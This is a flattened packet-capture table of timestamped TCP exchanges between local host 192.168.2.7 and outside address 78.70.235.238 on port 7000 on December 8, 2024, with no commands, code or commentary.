                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:23.937076092 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:23.942609072 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:23.942671061 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:23.942738056 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:23.947200060 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:23.947305918 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:23.947381973 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:23.951528072 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:23.951838017 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:23.951910019 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:23.955684900 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:23.955765963 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:23.955822945 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:23.961167097 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:23.961222887 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:23.961524963 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:23.963509083 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:23.963624954 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:23.963675022 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:23.985898018 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:23.985950947 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:23.985964060 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:23.988174915 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:23.988235950 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:23.988269091 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:23.992789984 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:23.992901087 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:23.992960930 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:23.998658895 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:23.998738050 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:23.998795033 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.002490044 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.002547026 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.002553940 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.006620884 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.006675959 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.006679058 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.024018049 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.024079084 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.024108887 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.027482033 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.027530909 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.027571917 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.032116890 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.032186031 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.032233000 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.035650015 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.035794973 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.035841942 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.040133953 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.040235043 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.040236950 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.045197010 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.045260906 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.045274019 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.052561045 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.052622080 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.052654028 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.056345940 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.056386948 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.056386948 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.061930895 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.061979055 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.062020063 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.066628933 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.066721916 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.066740036 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.071176052 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.071327925 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.071382999 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.075064898 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.075160027 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.075161934 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.080590963 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.080641031 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.080677032 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.083067894 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.083089113 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.083110094 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.105351925 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.105371952 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.105433941 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.107618093 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.107670069 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.107749939 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.112216949 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.112230062 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.112263918 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.116106033 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.116153955 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.116167068 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.120687008 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.120743990 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.120779991 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.126147032 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.126202106 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.126225948 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.129882097 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.129926920 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.143389940 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.143455982 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.143529892 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.146786928 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.146909952 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.146958113 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.151766062 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.151868105 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.151909113 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.155090094 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.155201912 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.155256987 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.159478903 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.159527063 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.159610987 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.164473057 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.164567947 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.164628983 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.171952963 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.172004938 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.172056913 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.175633907 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.175760984 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.175815105 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.181292057 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.181349993 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.181406021 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.186058044 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.186170101 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.186216116 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.190680981 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.190771103 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.190821886 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.194438934 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.194480896 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.194539070 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.199944019 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.200016022 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.200064898 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.202330112 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.202461004 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.202516079 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.225541115 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.225567102 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.225656033 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.232333899 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.232347965 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.232405901 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.236048937 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.236200094 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.236254930 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.239974022 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.240057945 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.240111113 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.246037006 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.246354103 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.246629000 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.250469923 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.250524998 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.250629902 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.263072014 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.263217926 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.263309956 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.266469002 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.266591072 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.266639948 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.271220922 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.271372080 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.271420002 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.274573088 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.274693012 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.274739981 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.279326916 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.279392958 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.279448032 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.284015894 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.284117937 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.284174919 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.291344881 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.291446924 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.291505098 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.295116901 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.295345068 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.295396090 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.300681114 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.300781012 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.300821066 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.305473089 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.305603027 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.305685997 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.310059071 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.310177088 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.310226917 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.313803911 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.313915014 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.313993931 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.319389105 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.319469929 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.319534063 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.321856976 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.321943045 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.321985006 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.345182896 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.345248938 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.345295906 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.351716995 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.351752043 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.351824999 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.355503082 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.355600119 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.355659962 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.359392881 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.359502077 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.359551907 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.365947962 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.365967035 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.366044044 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.370035887 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.370116949 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.370181084 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.382632017 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.382702112 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.382774115 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.386071920 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.386205912 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.386274099 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.390644073 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.390758991 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.390799999 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.394118071 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.394171953 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.394216061 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.398689032 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.398871899 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.398971081 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.403383017 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.403526068 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.403646946 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.410742998 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.410805941 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.410893917 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.414756060 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.414769888 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.414832115 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.420109034 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.420178890 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.420232058 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.424959898 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.425057888 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.425107956 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.429600954 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.429641962 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.429713011 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.433377981 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.433624983 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.433681011 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.438970089 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.439097881 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.439152002 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.441232920 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.441456079 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.441509008 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.464770079 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.464848042 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.464935064 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.471227884 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.471326113 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.471384048 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.475055933 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:24.475166082 CET70004983778.70.235.238192.168.2.7
